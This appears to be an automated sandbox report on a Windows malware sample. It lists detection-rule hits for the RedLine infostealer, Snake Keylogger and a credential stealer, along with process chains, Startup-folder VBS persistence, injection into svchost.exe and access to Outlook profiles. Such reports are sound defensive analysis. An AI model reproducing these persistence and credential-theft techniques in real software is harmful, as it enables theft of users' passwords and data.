Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4470368288.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.2183245336.00000000013E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.7b00000.4.raw.unpack, -k.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.svchost.exe.7b00000.4.raw.unpack, -cA-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.svchost.exe.7b00000.4.raw.unpack, -cA-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, -k.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, -cA-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, -cA-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.svchost.exe.7730f20.3.raw.unpack, -k.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.svchost.exe.7730f20.3.raw.unpack, -cA-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.svchost.exe.7730f20.3.raw.unpack, -cA-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.3.svchost.exe.305af20.1.raw.unpack, -k.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.3.svchost.exe.305af20.1.raw.unpack, -cA-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.3.svchost.exe.305af20.1.raw.unpack, -cA-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@10/10@4/4
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C637B5 GetLastError,FormatMessageW, 0_2_00C637B5
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C510BF AdjustTokenPrivileges,CloseHandle, 0_2_00C510BF
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00C516C3
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EC10BF AdjustTokenPrivileges,CloseHandle, 2_2_00EC10BF
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 2_2_00EC16C3
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00C651CD
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C7A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00C7A67C
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00C6648E
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BF42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00BF42A2
Source: C:\Users\user\Desktop\DSD876543456780000.exe File created: C:\Users\user\AppData\Local\nonsubmerged Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Mutant created: NULL
Source: C:\Users\user\Desktop\DSD876543456780000.exe File created: C:\Users\user\AppData\Local\Temp\aut650B.tmp Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs"
Source: DSD876543456780000.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: svchost.exe, 00000003.00000002.4473198929.000000000540F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2236229139.00000000062AA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005434000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005440000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005401000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000584D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2679722335.00000000066BA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000581C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000580E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: DSD876543456780000.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\DSD876543456780000.exe File read: C:\Users\user\Desktop\DSD876543456780000.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\DSD876543456780000.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
Source: C:\Users\user\Desktop\DSD876543456780000.exe Process created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
Source: C:\Users\user\Desktop\DSD876543456780000.exe Process created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\Desktop\DSD876543456780000.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DSD876543456780000.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: DSD876543456780000.exe Static file information: File size 1113600 > 1048576
Source: DSD876543456780000.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DSD876543456780000.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DSD876543456780000.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DSD876543456780000.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DSD876543456780000.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DSD876543456780000.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DSD876543456780000.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: _.pdb source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
